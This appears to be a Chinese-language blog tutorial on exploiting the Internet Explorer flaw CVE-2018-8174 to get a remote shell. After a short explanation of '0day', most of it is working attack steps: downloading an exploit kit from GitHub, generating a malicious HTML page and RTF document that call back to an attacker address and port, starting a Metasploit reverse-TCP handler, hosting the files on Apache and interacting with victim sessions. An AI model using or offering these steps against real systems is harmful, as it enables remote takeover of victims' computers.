1.1.1 利用CVE-2018-8174获取shell
0DAY漏洞最早的破解是专]针对软件的,叫做WAREZ,后来才发展到游戏,音乐,影视等其他内容的。0day 中的0表示zero,早期的Oday表示在软件发行后的24小时内就出现破解版本,现在我们已经引申了这个含义,只要是在软件或者其他东西发布后,在最短时间内出现相关破解的,都可以叫0day。
0day是一个统称,所有的破解都可以叫0day,CVE-2018-8174漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在2018年4月20日早上确认此漏洞,并于2018年5月8号发布了官方安全补丁,对该Oday漏洞进行了修复,并将其命名为CVE-2018-8174。
1.1.1.1 下载安装CVE-2018-8174_EXP
# mkdir -p /root/msf # cd /root/msf # wget https://codeload.github.com/Yt1g3r/CVE-2018-8174_EXP/zip/refs/heads/master # unzip master # mv CVE-2018-8174_EXP-master CVE-2018-8174_EXP
1.1.1.2 使用脚本创建后门网址和文件
注意:此脚本需要python2版本进行使用!!!
# python CVE-2018-8174.py -u http://192.168.10.180/exploit.html -o hack.rtf -i 192.168.10.180 -p 4444 UNICODE_URL len 134 , need to pad ... Generated hack.rtf successfully !!! Completed !!!
- 参数说明:
-u:URL地址,后门html文件
-o:生成后门文档
-i:攻击服务器地址,被攻击服务器要连接到的地址
-p:攻击服务器端口,被攻击服务器要连接到的端口
1.1.1.3 使用后门html
- msf开启监听
msf6 > use exploit/multi/handler [*] Using configured payload cmd/unix/reverse_netcat msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp payload => windows/shell/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.10.180 LHOST => 192.168.10.180 msf6 exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf6 exploit(multi/handler) > run -j
- 开启下载网址:
# cp exploit.html hack.rtf /var/www/html # systemctl start apache2.service
1.1.1.4 受害者打开网页
- 查看连接情况:
msf6 exploit(multi/handler) > sessions

msf6 exploit(multi/handler) > sessions -i 2


我的微信
如果有技术上的问题可以扫一扫我的微信